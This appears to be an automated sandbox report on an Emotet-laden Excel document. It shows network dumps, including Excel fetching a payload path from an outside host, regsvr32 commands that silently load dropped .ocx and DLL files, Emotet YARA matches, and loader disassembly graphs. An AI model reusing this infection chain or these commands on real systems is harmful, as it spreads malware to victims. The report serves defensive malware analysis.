69 70 61 67 65 2e 63 6f 6d 2f 67 65 6e 65 72 61 6c 41 70 70 43 2f 73 63 72 69 70 74 63 61 74 2f 38 37 61 65 32 30 37 32 30 31 63 35 35 62 38 34 63 35 32 37 30 38 35 31 31 35 39 32 36 30 65 31 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 73 74 79 6c 65 73 68 65 65 74 31 22 3e 3c 73 74 79 6c 65 3e 23 6e 61 76 20 6c 69 20 7b 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7d 61 2e 6e 61 76 2d 74 68 69 6e 2d 72 69 67 68 74 20 7b 70 61 64 64 69 6e 67 3a 20 30 20 33 30 70 78 3b 7d 23 6e 61 76 20 6c 69 20 61 2e 6c 6f 67 69 6e 6b 65 79 2c 20 23 6e 61 76 20 6c 69 20 61 2e 6c 6f 67 69 6e 6b 65 79 3a 68 6f 76 65 72 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 38 70 78 20 2d 38 70 78 3b 7d 3c 2f 73 74 79 6c 65 3e 20 3c 64 69 76 20 69 64 3d 22 64 6f 63 32 22 20 63 6c 61 73 73 3d 22 79 75 69 2d 74 32 22 3e 20 3c 64 69 76 20 69 64 3d 22 68 64 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 39 35 30 70 78 3b 22 3e 20 3c 64 69 76 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 22 3e 20 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 70 61 67 65 2e 63 6f 6d 2f 22 3e 69 50 61 67 65 3c 2f 61 3e 3c 2f 68 31 3e 20 3c 68 32 3e 50 6f 77 65 72 66 75 6c 20 57 65 62 20 48 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 4e 61 6d 65 73 20 66 6f 72 20 48 6f 6d 65 20 61 6e 64 20 42 75 73 69 6e 65 73 73 3c 2f 68 32 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 6d 61 67 65 73 2e 69 70 61 67 65 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 69 70 61 67 65 2f 77 65 62 2d 68 6f 73 74 69 6e 67 2d 6c 65 61 64 65 72 2e 67 69 66 22 20 61 6c 74 3d 22 4f 75 72 20 50 6c 61 74 66 6f 72 6d 20 53 65 72 76 65 73 20 4f 76 65 72 20 31 2c 30 30 30 2c 30 30 30 20 57 65 62 73 69 74 65 73 22 20 73 74 79 6c 65 3d 22 6d
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" /><meta name="robots" content="noindex, nofollow" /> <title>iPage</title> <link rel="stylesheet" type="text/css" href="http://www1.ipage.com/xslt/elements/generic_csscomponent.css" /> <script src="http://www1.ipage.com/generalAppC/scriptcat/87ae207201c55b84c5270851159260e1.1" type="text/javascript"></script></head><body id="stylesheet1"><style>#nav li {display: inline-block;}a.nav-thin-right {padding: 0 30px;}#nav li a.loginkey, #nav li a.loginkey:hover {background-position: -8px -8px;}</style> <div id="doc2" class="yui-t2"> <div id="hd" style="width: 950px;"> <div id="masthead" style="position: relative;"> <h1><a href="http://www.ipage.com/">iPage</a></h1> <h2>Powerful Web Hosting and Domain Names for Home and Business</h2><img src="http://images.ipage.com/templates/ipage/web-hosting-leader.gif" alt="Our Platform Serves Over 1,000,000 Websites" style="m
                                                                                                                    Aug 6, 2022 09:20:20.218457937 CEST710INData Raw: 61 72 67 69 6e 2d 6c 65 66 74 3a 20 36 35 70 78 3b 22 20 2f 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 2e 69 61 64 2e 6c 69 76 65 70 65 72 73 6f 6e 2e 6e 65 74 2f 68 63 2f 36 36 36 35 31 33 39 36 2f 3f 63 6d 64 3d 66
                                                                                                                    Data Ascii: argin-left: 65px;" /><a href="https://server.iad.liveperson.net/hc/66651396/?cmd=file&amp;file=visitorWantsToChat&amp;site=66651396&amp;byhref=1&amp;ref=chatbubble" target="chat66651396" onclick="javascript:window.open('http://server.iad.livep
                                                                                                                    Aug 6, 2022 09:20:20.218513012 CEST711INData Raw: 62 64 22 3e 20 3c 64 69 76 20 69 64 3d 22 6e 61 76 63 6f 6d 70 6f 6e 65 6e 74 22 20 63 6c 61 73 73 3d 22 79 75 69 2d 62 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 6c 6f 63 6b 22 3e 20 3c 68 33 3e 3c 61 20 68 72 65 66 3d 22 68 74 74
                                                                                                                    Data Ascii: bd"> <div id="navcomponent" class="yui-b"> <div class="navblock"> <h3><a href="http://www.ipage.com/">Return to Home Page</a></h3> </div> </div> <div id="main" class="main"> <h1>This site is temporarily unavailable</h1> <div id="subhead"></div
                                                                                                                    Aug 6, 2022 09:20:20.218571901 CEST713INData Raw: 63 6f 6d 6d 65 72 63 65 22 3e 45 2d 43 6f 6d 6d 65 72 63 65 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 70 61 67 65 2e 63 6f 6d 2f 70 72 6f 64 75 63 74 2f 73
                                                                                                                    Data Ascii: commerce">E-Commerce Services</a></li> <li><a href="http://www.ipage.com/product/services.bml?service=scripting">Scripting &amp; Add-ons</a></li> <li><a href="http://www.ipage.com/product/services.bml?service=marketing">Marketing Services</a><
                                                                                                                    Aug 6, 2022 09:20:20.218626976 CEST714INData Raw: 2f 2f 77 77 77 2e 69 70 61 67 65 2e 63 6f 6d 2f 64 69 72 65 63 74 6f 72 79 2f 22 3e 43 6f 6d 6d 75 6e 69 74 79 20 44 69 72 65 63 74 6f 72 79 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69
                                                                                                                    Data Ascii: //www.ipage.com/directory/">Community Directory</a></li> <li><a href="http://www.ipage.com/support/contact.bml">Contact Us</a></li> </ul> </div> </div> <div class="yui-g customer-tools"> <div class="yui-u first"> <h3><a href="http://www.ipage.


                                                                                                                    HTTPS Proxied Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.2.2249171208.67.23.91443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    2022-08-06 07:20:17 UTC0OUTGET /images/psQbAjrrEOXWPrS/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: www.zardamarine.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2022-08-06 07:20:17 UTC0INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 06 Aug 2022 07:20:17 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 961
                                                                                                                    Connection: close
                                                                                                                    Last-Modified: Wed, 04 Jan 2017 19:07:47 GMT
                                                                                                                    ETag: "2a8f73-3c1-54549800fc6c0"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2022-08-06 07:20:17 UTC0INData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 7a 61 72 64 61 6d 61 72 69 6e 65 2e 63 6f 6d 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63
                                                                                                                    Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><ADDRESS>Web Server at zardamarine.com</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a c


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:09:19:14
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13fb20000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:09:19:24
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx
                                                                                                                    Imagebase:0xff180000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:09:19:25
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                    Imagebase:0xff7d0000
                                                                                                                    File size:27136 bytes
                                                                                                                    MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:09:19:26
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx
                                                                                                                    Imagebase:0xffa70000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:7
                                                                                                                    Start time:09:19:27
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"
                                                                                                                    Imagebase:0xffa70000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_3, Description: , Source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:09:19:28
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx
                                                                                                                    Imagebase:0xffa70000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:11.5%
                                                                                                                      Dynamic/Decrypted Code Coverage:24%
                                                                                                                      Signature Coverage:23.6%
                                                                                                                      Total number of Nodes:246
                                                                                                                      Total number of Limit Nodes:11
                                                                                                                      execution_graph 4325 61a019a0 4326 61a019af 4325->4326 4328 61a019c3 4326->4328 4329 61a02810 4326->4329 4330 61a02860 4329->4330 4331 61a02819 4329->4331 4332 61a02891 InitializeCriticalSection 4330->4332 4333 61a0286a 4330->4333 4334 61a02830 4331->4334 4335 61a0281b 4331->4335 4332->4333 4333->4328 4336 61a02680 3 API calls 4334->4336 4339 61a0283a 4334->4339 4340 61a02820 4335->4340 4341 61a02680 EnterCriticalSection 4335->4341 4336->4339 4337 61a02845 DeleteCriticalSection 4337->4340 4339->4337 4339->4340 4340->4328 4342 61a026d4 4341->4342 4344 61a026a1 4341->4344 4343 61a026b0 TlsGetValue GetLastError 4343->4344 4344->4342 4344->4343 4269 180020db0 4270 180020dff 4269->4270 4273 180006354 4270->4273 4272 18002104b 4275 18000640f 4273->4275 4274 1800064ed CreateProcessW 4274->4272 4275->4274 4349 61a02ff0 4350 61a03040 4349->4350 4351 61a03018 4349->4351 4353 61a03270 strcmp 4350->4353 4354 61a03023 4351->4354 4355 61a03270 4351->4355 4353->4351 4356 61a0327e 4355->4356 4357 61a032af 4355->4357 4358 61a03289 strcmp 4356->4358 4359 61a032ba 4356->4359 4357->4354 4358->4357 4359->4354 4360 61a026f0 4361 61a02714 4360->4361 4362 61a02709 4360->4362 4361->4362 4363 61a0272b EnterCriticalSection LeaveCriticalSection 4361->4363 4364 61a013f0 4365 61a01403 4364->4365 4370 61a01ff0 4365->4370 4367 61a01423 4374 61a02360 4367->4374 4371 61a02030 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4370->4371 4372 61a02019 4370->4372 4373 61a02089 4371->4373 4372->4367 4373->4367 4375 61a02371 4374->4375 4377 61a01428 4375->4377 4380 61a02930 4375->4380 4378 61a023aa 4378->4377 4379 61a02445 RtlAddFunctionTable 4378->4379 4379->4377 4381 61a02941 4380->4381 4382 61a02999 strncmp 4381->4382 4383 61a029ae 4381->4383 4382->4381 4382->4383 4383->4378 4384 61a02ef0 4385 61a03270 strcmp 4384->4385 4386 61a02f09 4385->4386 4421 61a03070 4424 61a02f50 4421->4424 4425 61a03270 strcmp 4424->4425 4426 61a02f61 4425->4426 4427 61a01970 4428 61a01978 4427->4428 4429 61a0197d 4428->4429 4430 61a02810 5 API calls 4428->4430 4431 61a01995 4430->4431 4432 61a02470 4435 61a02492 4432->4435 4433 61a024ec signal 4434 61a02610 signal 4433->4434 4433->4435 4437 61a02507 4434->4437 4435->4433 4436 61a025a3 signal 4435->4436 4435->4437 4439 61a0255f signal 4435->4439 4436->4435 4438 61a02660 signal 4436->4438 4439->4435 4440 61a02640 signal 4439->4440 4440->4437 4441 61a02770 4442 61a02790 EnterCriticalSection 4441->4442 4443 61a02781 4441->4443 4444 61a027c3 LeaveCriticalSection 4442->4444 4446 61a027a9 4442->4446 4445 61a027d0 4444->4445 4446->4444 4448 61a027af free LeaveCriticalSection 4446->4448 4448->4445 4253 180014674 4256 180020760 4253->4256 4257 180020791 4256->4257 4258 1800146f0 4257->4258 4259 180020a5e Process32FirstW 4257->4259 4259->4257 4345 61a01480 4346 61a014d4 4345->4346 4347 61a014fe 4345->4347 4346->4347 4348 61a014e8 strcmp 4346->4348 4348->4346 4348->4347 4387 61a021c0 4388 61a02210 4387->4388 4389 61a021ce 4387->4389 4393 61a0221d 4388->4393 4397 61a02294 4388->4397 4390 61a02240 4389->4390 4391 61a021d5 signal 4389->4391 4394 61a021f3 4390->4394 4395 61a02251 4390->4395 4390->4397 4392 61a02310 signal 4391->4392 4391->4394 4392->4394 4393->4391 4393->4394 4395->4394 4396 61a02263 signal 4395->4396 4396->4394 4398 61a02336 signal 4396->4398 4397->4394 4399 61a02347 signal 4397->4399 4398->4394 4400 61a031c0 4401 61a031d7 4400->4401 4402 61a03270 strcmp 4401->4402 4403 61a03214 4401->4403 4402->4401 4404 61a020c0 RtlCaptureContext RtlLookupFunctionEntry 4405 61a021a0 4404->4405 4406 61a020fd RtlVirtualUnwind 4404->4406 4407 61a02133 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 4405->4407 4406->4407 4407->4405 4408 61a030c0 4409 61a03270 strcmp 4408->4409 4410 61a03104 4409->4410 4411 61a03108 4410->4411 4412 61a03270 strcmp 4410->4412 4412->4411 4449 61a02e41 LeaveCriticalSection 4260 290000 4261 290183 4260->4261 4262 29043e VirtualAlloc 4261->4262 4265 290462 4262->4265 4263 290531 GetNativeSystemInfo 4264 29056d VirtualAlloc 4263->4264 4266 290a00 4263->4266 4268 29058b 4264->4268 4265->4263 4265->4266 4267 2909d9 VirtualProtect 4267->4268 4268->4266 4268->4267 4268->4268 4276 180004ed0 4279 180009488 4276->4279 4278 180004f3a 4286 1800094ec 4279->4286 4281 18000ace5 4306 1800023ec 4281->4306 4284 18000acb7 4284->4278 4286->4281 4286->4284 4288 180022ff4 4286->4288 4292 18000bfc8 4286->4292 4296 18001ec00 4286->4296 4300 18002413c 4286->4300 4289 18002302d 4288->4289 4290 180023059 4289->4290 4310 180014674 4289->4310 4290->4286 4294 18000bff0 4292->4294 4293 18000c1ac 4293->4286 4294->4293 4295 180014674 Process32FirstW 4294->4295 4295->4294 4297 18001ec4a 4296->4297 4298 18001efa9 4297->4298 4299 180014674 Process32FirstW 4297->4299 4298->4286 4299->4297 4301 180024163 4300->4301 4302 1800244f8 4301->4302 4305 180024502 4301->4305 4313 180005bfc 4301->4313 4317 18001e070 4302->4317 4305->4286 4307 180002420 4306->4307 4308 180002548 4307->4308 4309 180020db0 CreateProcessW 4307->4309 4308->4284 4309->4308 4311 180020760 Process32FirstW 4310->4311 4312 1800146f0 4311->4312 4312->4289 4316 180005c2d 4313->4316 4315 18000624a 4315->4301 4316->4315 4321 180020db0 4316->4321 4319 18001e09c 4317->4319 4318 18001e884 4318->4305 4319->4318 4320 180020db0 CreateProcessW 4319->4320 4320->4318 4322 180020dff 4321->4322 4323 180006354 CreateProcessW 4322->4323 4324 18002104b 4323->4324 4324->4316 4183 61a01290 4184 61a01320 4183->4184 4185 61a012aa 4183->4185 4213 61a01c20 4184->4213 4187 61a012d3 4185->4187 4189 61a01c20 3 API calls 4185->4189 4188 61a01325 4191 61a01371 4188->4191 4192 61a0132d 4188->4192 4190 61a012bb 4189->4190 4193 61a01540 6 API calls 4190->4193 4194 61a01050 5 API calls 4191->4194 4225 61a01540 4192->4225 4197 61a012c8 4193->4197 4201 61a0137e 4194->4201 4196 61a0133a 4196->4197 4198 61a01345 4196->4198 4197->4187 4199 61a012f0 4197->4199 4200 61a01540 6 API calls 4198->4200 4199->4197 4235 61a01050 4199->4235 4202 61a01352 4200->4202 4201->4187 4203 61a013c0 4201->4203 4204 61a0139b 4201->4204 4211 61a01050 5 API calls 4202->4211 4205 61a013c5 4203->4205 4206 61a013cf 4203->4206 4204->4187 4208 61a01050 5 API calls 4204->4208 4205->4192 4209 61a01540 6 API calls 4206->4209 4210 61a0130c 4208->4210 4212 61a013df 4209->4212 4210->4187 4211->4199 4214 61a01c39 4213->4214 4220 61a01c44 4213->4220 4214->4188 4215 61a01f17 4217 61a01a40 __iob_func 4215->4217 4216 61a01cc1 4216->4214 4219 61a01d43 VirtualQuery 4216->4219 4218 61a01f23 4217->4218 4218->4188 4222 61a01ef9 4219->4222 4223 61a01d5d VirtualProtect 4219->4223 4220->4214 4220->4215 4220->4216 4249 61a01a40 4220->4249 4224 61a01a40 __iob_func 4222->4224 4223->4216 4224->4215 4226 61a01574 4225->4226 4227 61a0155b 4225->4227 4228 61a015a5 CoLoadLibrary 4226->4228 4227->4196 4229 61a015c0 LoadLibraryW 4228->4229 4230 61a01773 ExitProcess 4228->4230 4232 61a0166d atoi VirtualAlloc 4229->4232 4233 61a01618 4229->4233 4231 61a01801 RtlExitUserProcess 4230->4231 4234 61a017c5 4230->4234 4231->4196 4232->4233 4233->4232 4234->4231 4236 61a01064 4235->4236 4241 61a010e1 4235->4241 4237 61a010d6 4236->4237 4238 61a010b8 4236->4238 4239 61a010a0 Sleep 4236->4239 4237->4210 4240 61a010c7 _amsg_exit 4238->4240 4247 61a011d0 4238->4247 4239->4238 4239->4239 4240->4237 4241->4237 4242 61a01129 Sleep 4241->4242 4244 61a01141 4241->4244 4242->4241 4242->4244 4243 61a0125b _initterm 4246 61a0116b 4243->4246 4244->4243 4244->4246 4245 61a0122d 4245->4210 4246->4210 4247->4245 4248 61a0120f free 4247->4248 4248->4245 4250 61a01a67 4249->4250 4251 61a01a82 __iob_func 4250->4251 4252 61a01a9b 4251->4252 4413 61a02bd0 4414 61a02be1 4413->4414 4416 61a02bf0 4413->4416 4415 61a02c80 LoadLibraryW 4415->4414 4416->4415 4417 61a02c64 GetModuleHandleA 4416->4417 4417->4414 4418 61a02c7d 4417->4418 4418->4415 4450 61a01950 4453 61a018a0 4450->4453 4452 61a01959 4454 61a018b4 4453->4454 4455 61a01935 _onexit 4454->4455 4456 61a018bf 4454->4456 4455->4452 4456->4452 4419 61a02dd9 GetTickCount 4420 61a0a220 4419->4420

                                                                                                                      Executed Functions

                                                                                                                      Function 00290000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 290000-290460 call 290aa8 * 2 VirtualAlloc 22 29048a-290494 0->22 23 290462-290466 0->23 26 29049a-29049e 22->26 27 290a91-290aa6 22->27 24 290468-290488 23->24 24->22 24->24 26->27 28 2904a4-2904a8 26->28 28->27 29 2904ae-2904b2 28->29 29->27 30 2904b8-2904bf 29->30 30->27 31 2904c5-2904d2 30->31 31->27 32 2904d8-2904e1 31->32 32->27 33 2904e7-2904f4 32->33 33->27 34 2904fa-290507 33->34 35 290509-290511 34->35 36 290531-290567 GetNativeSystemInfo 34->36 37 290513-290518 35->37 36->27 38 29056d-290589 VirtualAlloc 36->38 39 29051a-29051f 37->39 40 290521 37->40 41 29058b-29059e 38->41 42 2905a0-2905ac 38->42 43 290523-29052f 39->43 40->43 41->42 44 2905af-2905b2 42->44 43->36 43->37 46 2905c1-2905db 44->46 47 2905b4-2905bf 44->47 48 29061b-290622 46->48 49 2905dd-2905e2 46->49 47->44 50 290628-29062f 48->50 51 2906db-2906e2 48->51 52 2905e4-2905ea 49->52 50->51 55 290635-290642 50->55 56 2906e8-2906f9 51->56 57 290864-29086b 51->57 53 29060b-290619 52->53 54 2905ec-290609 52->54 53->48 53->52 54->53 54->54 55->51 60 290648-29064f 55->60 61 290702-290705 56->61 58 290871-29087f 57->58 59 290917-290929 57->59 64 29090e-290911 58->64 62 29092f-290937 59->62 63 290a07-290a1a 59->63 65 290654-290658 60->65 66 2906fb-2906ff 61->66 67 290707-29070a 61->67 69 29093b-29093f 62->69 88 290a1c-290a27 63->88 89 290a40-290a4a 63->89 64->59 68 290884-2908a9 64->68 70 2906c0-2906ca 65->70 66->61 71 290788-29078e 67->71 72 29070c-29071d 67->72 95 2908ab-2908b1 68->95 96 290907-29090c 68->96 75 2909ec-2909fa 69->75 76 290945-29095a 69->76 73 29065a-290669 70->73 74 2906cc-2906d2 70->74 78 290794-2907a2 71->78 77 29071f-290720 72->77 72->78 84 29066b-290678 73->84 85 29067a-29067e 73->85 74->65 80 2906d4-2906d5 74->80 75->69 86 290a00-290a01 75->86 82 29097b-29097d 76->82 83 29095c-29095e 76->83 87 290722-290784 77->87 90 2907a8 78->90 91 29085d-29085e 78->91 80->51 100 29097f-290981 82->100 101 2909a2-2909a4 82->101 97 29096e-290979 83->97 98 290960-29096c 83->98 99 2906bd-2906be 84->99 102 29068c-290690 85->102 103 290680-29068a 85->103 86->63 87->87 104 290786 87->104 105 290a38-290a3e 88->105 93 290a7b-290a8e 89->93 94 290a4c-290a54 89->94 92 2907ae-2907d4 90->92 91->57 126 290835-290839 92->126 127 2907d6-2907d9 92->127 93->27 94->93 107 290a56-290a78 94->107 116 2908bb-2908c8 95->116 117 2908b3-2908b9 95->117 96->64 108 2909be-2909bf 97->108 98->108 99->70 109 290989-29098b 100->109 110 290983-290987 100->110 114 2909ac-2909bb 101->114 115 2909a6-2909aa 101->115 112 290692-2906a3 102->112 113 2906a5-2906a9 102->113 111 2906b6-2906ba 103->111 104->78 105->89 106 290a29-290a35 105->106 106->105 107->93 122 2909c5-2909cb 108->122 109->101 120 29098d-29098f 109->120 110->108 111->99 112->111 113->99 121 2906ab-2906b3 113->121 114->108 115->108 124 2908ca-2908d1 116->124 125 2908d3-2908e5 116->125 123 2908ea-2908fe 117->123 128 290999-2909a0 120->128 129 290991-290997 120->129 121->111 130 2909d9-2909e9 VirtualProtect 122->130 131 2909cd-2909d3 122->131 123->96 142 290900-290905 123->142 124->124 124->125 125->123 135 29083b 126->135 136 290844-290850 126->136 133 2907db-2907e1 127->133 134 2907e3-2907f0 127->134 128->122 129->108 130->75 131->130 138 290812-29082c 133->138 139 2907fb-29080d 134->139 140 2907f2-2907f9 134->140 135->136 136->92 141 290856-290857 136->141 138->126 